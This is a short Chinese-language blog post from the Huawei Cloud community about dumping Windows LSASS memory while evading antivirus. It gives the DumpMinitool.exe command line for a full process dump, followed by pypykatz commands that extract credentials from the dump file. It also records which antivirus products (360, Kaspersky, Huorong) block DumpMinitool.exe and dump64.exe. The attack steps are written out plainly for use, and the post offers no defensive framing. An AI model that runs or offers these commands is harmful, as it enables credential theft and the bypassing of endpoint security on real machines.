免杀- 绕过dump lsass 实测

举报
亿人安全 发表于 2023/05/30 21:51:17 2023/05/30
【摘要】 DumpMinitool.exe经测试,360 和卡巴拦截,火绒正常Visual Studio 2022 的一个程序,使用这个需要安装扩展开发PLAINTEXT1C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions\DumpMinitool....

DumpMinitool.exe

经测试,360 和卡巴拦截,火绒正常

Visual Studio 2022 的一个程序,使用这个需要安装扩展开发

image-20220501020509596

PLAINTEXT 

1

C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions\DumpMinitool.exe

image-20220501020021810

使用命令

PLAINTEXT 

1
2
3
4
5

DumpMinitool.exe --file c:\users\public\test.txt --processId PID --dumpType Full

# 读取
pip install pypykatz
pypykatz lsa minidump 111.txt

image-20220501023509870

360 拦截

image-20220501022407309

卡巴斯基拦截

image-20220501022554024

火绒不拦截

image-20220501022719006

dump64.exe

卡巴斯基拦截,火绒和 360 不拦截

360 不拦截

image-20220501025143169

火绒不拦截

image-20220501025521687


【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
网络
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

确认 取消

加入云驻计划,成为创作者

  • 华为云周边好礼
  • 免费体验产品
  • 特殊身份标识
  • 线下官方门票
  • 内部专家零距离
  • 与10000+优质创作者共同成长
立即加入